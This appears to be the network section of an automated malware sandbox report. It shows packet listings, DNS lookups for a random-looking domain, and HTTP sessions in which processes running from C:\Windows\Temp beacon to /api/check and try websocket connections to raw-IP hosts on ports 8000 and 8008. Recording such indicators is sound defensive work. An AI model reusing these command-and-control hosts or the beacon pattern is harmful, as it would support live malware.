                                                                                                                          Nov 8, 2024 11:00:22.814121008 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.814125061 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.814419985 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.814501047 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.814508915 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.814727068 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.051631927 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.051853895 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.051884890 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.052038908 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.052222967 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.052359104 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.052582026 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.052869081 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.053036928 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.053116083 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.053510904 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.053745985 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.054121971 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.054121971 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.054126978 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.054500103 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.054522991 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.054743052 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.054831982 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.054837942 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.054879904 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.055067062 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.055593014 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.055629969 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.055890083 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.055896044 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.056221962 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.056482077 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.056726933 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.056746960 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.056965113 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.057013988 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.057466984 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.057569027 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.057663918 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.057851076 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.057857990 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.058092117 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.058382988 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.058626890 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.059115887 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.059421062 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.059425116 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.105353117 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.294033051 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.294039011 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.294533014 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.296094894 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.296098948 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.296207905 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.296263933 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.296466112 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.296466112 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.296478033 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.296808958 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.298110008 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.298120022 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.298449993 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.298641920 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.298648119 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.298969030 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.299158096 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.299165964 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.299350977 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.301506042 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.301516056 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.301934004 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.301949978 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.302124023 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.302809000 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.302871943 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.302968979 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.302973986 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.303191900 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.303376913 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.539444923 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.539458036 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.539786100 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.539786100 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.539794922 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.540190935 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.541148901 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.541160107 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.541452885 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.541452885 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.541462898 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.541637897 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.542960882 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.542970896 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.543303967 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.543308020 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.543495893 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.544985056 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.544995070 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.545309067 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.545485973 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.545490980 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.545677900 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.545677900 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.545732975 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.545953035 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:23.751962900 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:23.753067017 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:24.175964117 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:24.176754951 CET49760443192.168.11.30172.67.137.62

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 8, 2024 10:58:08.154825926 CET4954753192.168.11.301.1.1.1
                                                                                                                          Nov 8, 2024 10:58:08.367566109 CET53495471.1.1.1192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.207007885 CET6323053192.168.11.301.1.1.1
                                                                                                                          Nov 8, 2024 10:58:29.309398890 CET53632301.1.1.1192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.385066032 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.496586084 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.496587992 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.496587992 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.502054930 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.502299070 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.517395020 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.517613888 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.518421888 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.638681889 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.638683081 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.638683081 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.638683081 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.638683081 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.638684034 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.643799067 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.643811941 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.670248985 CET51045443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:35.758148909 CET44351045172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.785731077 CET51045443192.168.11.30172.64.41.3

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Nov 8, 2024 10:58:08.154825926 CET192.168.11.301.1.1.10xa051Standard query (0)uyt1n8ded9fb380.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 8, 2024 10:58:29.207007885 CET192.168.11.301.1.1.10x3e06Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Nov 8, 2024 10:58:08.367566109 CET1.1.1.1192.168.11.300xa051No error (0)uyt1n8ded9fb380.com172.67.137.62A (IP address)IN (0x0001)false
                                                                                                                          Nov 8, 2024 10:58:08.367566109 CET1.1.1.1192.168.11.300xa051No error (0)uyt1n8ded9fb380.com104.21.86.219A (IP address)IN (0x0001)false
                                                                                                                          Nov 8, 2024 10:58:29.309398890 CET1.1.1.1192.168.11.300x3e06No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                          Nov 8, 2024 10:58:29.309398890 CET1.1.1.1192.168.11.300x3e06No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • uyt1n8ded9fb380.com
                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                          • armmf.adobe.com
                                                                                                                          • 23.88.71.29:8000
                                                                                                                          • 206.206.126.252:8008

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.11.3049752172.67.137.62805060C:\Windows\Temp\svczHost.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 8, 2024 10:58:56.073613882 CET78OUTGET /api/check HTTP/1.1
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Nov 8, 2024 10:58:56.756376028 CET1289INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:56 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-store,no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JptVxqwAWr4CtY8OkJPLuFCKugIiSHbABlDKvHP%2BioeWWtfWIFJEOupkU5WhmKEcuJKDvGv5pYr6JD%2FhoqjjSInolkMkR7rN4396kS%2BmA4yDMa%2FY1Aw3d7OI50Wu1aXg%2Fpk5XoCkwXxv"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=20280&sent=17261&recv=8410&lost=0&retrans=0&sent_bytes=24274187&recv_bytes=168313&delivery_rate=14205405&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          vary: accept-encoding
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b518cc51c425-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=78&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 31 36 33 0d 0a 31 37 33 31 30 35 39 39 33 36 7c 6a 43 52 4f 51 4c 74 55 79 56 4c 33 49 30 44 64 46 63 63 6d 58 41 78 39 6b 62 38 79 42 51 76 53 37 6b 4f 6f 4b 4e 63 57 6e 46 6f 77 36 4a 71 4e 70 77 6d 55 65 57 6d 2f 53 39 65 49 58 31 69 48 6a 47 59 30 54 58 4c 66 77 73 34 57 4f 46 39 7a 4e 69 50 53 6b 6f 79 69 44 72 74 74 6b 61 4a 65 51 38 75 47 73 68 4b 42 73 2f 41 51 69 44 71 62 34 58 6c 52 32 58 48 72 49 4a 31 73 66 35 71 72 43 45 2f 39 78 2b 73 4a 72 63 68 46 6a 37 43 32 56 53 4f 37 36 43 44 58 74 55 61 71 37 47 56 6a 52 6d 52 54 71 4d 43 69 63 4a 6a 32 53 68 67 53 64 31 50 63 46 34 71 4f 39 63 72 4a 32 57 69 53 41 56 49 65 6c 7a 58 57 79 4d 33 77 49 2b 46 46 50 52 57 77 57 72 38 47 44 45 41 6e 49
                                                                                                                          Data Ascii: 1631731059936|jCROQLtUyVL3I0DdFccmXAx9kb8yBQvS7kOoKNcWnFow6JqNpwmUeWm/S9eIX1iHjGY0TXLfws4WOF9zNiPSkoyiDrttkaJeQ8uGshKBs/AQiDqb4XlR2XHrIJ1sf5qrCE/9x+sJrchFj7C2VSO76CDXtUaq7GVjRmRTqMCicJj2ShgSd1PcF4qO9crJ2WiSAVIelzXWyM3wI+FFPRWwWr8GDEAnI
                                                                                                                          Nov 8, 2024 10:58:56.756386042 CET125INData Raw: 71 53 4a 2b 2b 72 66 6f 7a 4d 4a 59 54 6f 52 74 4a 6a 66 30 30 4a 38 67 47 4f 43 31 41 43 6a 61 35 59 6d 6b 67 2b 5a 4a 6a 39 70 4a 55 36 57 2b 62 58 49 71 7a 41 46 6c 47 45 58 64 51 55 45 35 62 2b 33 46 65 38 44 56 4a 4f 52 6c 6b 56 79 33 49 58
                                                                                                                          Data Ascii: qSJ++rfozMJYToRtJjf00J8gGOC1ACja5Ymkg+ZJj9pJU6W+bXIqzAFlGEXdQUE5b+3Fe8DVJORlkVy3IXtY4a8oajvhjcGuSq4P8TEl85zibU8KAu2Vx/mJg==
                                                                                                                          Nov 8, 2024 10:58:56.756392002 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.11.304975723.88.71.2980007080C:\Windows\Temp\myRdpService.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 8, 2024 11:00:03.408015013 CET164OUTGET /client/ws HTTP/1.1
                                                                                                                          Host: 23.88.71.29:8000
                                                                                                                          Connection: Upgrade
                                                                                                                          Upgrade: websocket
                                                                                                                          Sec-WebSocket-Key: rG4xY6l9GU61tyuh7IveiA==
                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                          Nov 8, 2024 11:00:04.166117907 CET1289INHTTP/1.1 404 Not Found
                                                                                                                          Cache-Control: private
                                                                                                                          Upgrade: websocket
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Server: Microsoft-IIS/8.5
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8gWulU9VBcbM3PyDBdjqwJgVV3sJnKq6Rk6CV64p7wh772cHuBVE0lFIqTXMzdRYNKNSm230hZyaE2bIxalmwGdqjs%2FMvY1%2Bl8bwBdtgeZrvJZdCkJunQDZfY3n8f%2FfncdZcPtYi6oJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          CF-RAY: 8df4b6bdeb569a09-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6915&sent=4190&recv=1575&lost=0&retrans=0&sent_bytes=3694721&recv_bytes=198676&delivery_rate=1839783&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Date: Fri, 08 Nov 2024 10:00:03 GMT
                                                                                                                          Content-Length: 4852
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{m


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.11.3049758206.206.126.25280087080C:\Windows\Temp\myRdpService.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 8, 2024 11:00:06.496418953 CET168OUTGET /client/ws HTTP/1.1
                                                                                                                          Host: 206.206.126.252:8008
                                                                                                                          Connection: Upgrade
                                                                                                                          Upgrade: websocket
                                                                                                                          Sec-WebSocket-Key: J87z2mPEuUKm1EuLarywEw==
                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                          Nov 8, 2024 11:00:06.892200947 CET1289INHTTP/1.1 404 Not Found
                                                                                                                          Cache-Control: private
                                                                                                                          Upgrade: websocket
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lezFM%2Fl9gHu3mqbHgWcM0lKxlbb6H%2BhHn7aH5fh8H%2BrxXxMlhV%2B4sI%2FhPoH4desr%2Fa21WIY6kKahle4ZPQd5Uyl6t4tTrthicgRputp3RtWeMWHfDyndx4qh3OAJBkRFyIqclrWVTEbh"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          CF-RAY: 8df4b6d1af7f89bc-SIN
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7073&sent=552&recv=385&lost=0&retrans=0&sent_bytes=459378&recv_bytes=48952&delivery_rate=6391494&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Date: Fri, 08 Nov 2024 10:00:06 GMT
                                                                                                                          Content-Length: 4852
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pr


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          3192.168.11.304975923.88.71.298000
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 8, 2024 11:00:19.106594086 CET164OUTGET /client/ws HTTP/1.1
                                                                                                                          Host: 23.88.71.29:8000
                                                                                                                          Connection: Upgrade
                                                                                                                          Upgrade: websocket
                                                                                                                          Sec-WebSocket-Key: NhGybyMvX0e72JtAxlQvsw==
                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                          Nov 8, 2024 11:00:19.863357067 CET1289INHTTP/1.1 404 Not Found
                                                                                                                          Cache-Control: private
                                                                                                                          Upgrade: websocket
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Server: Microsoft-IIS/8.5
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S7ostF2o7UKnGNgZzXXacFyv4RMQXdLcGci3oLFEgjYsEggDVS6NF64LV6lwFrYVrjt5dii%2BLyMw1xEFDV7HeEmZYNhWWXndhTLV0EibsM7NXhUrVrc%2BIeLfMeryVXteZsUPl5y4lG0a"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          CF-RAY: 8df4b7200ed9dbd8-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7909&sent=995&recv=504&lost=0&retrans=0&sent_bytes=883143&recv_bytes=47742&delivery_rate=1855482&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Date: Fri, 08 Nov 2024 10:00:19 GMT
                                                                                                                          Content-Length: 4852
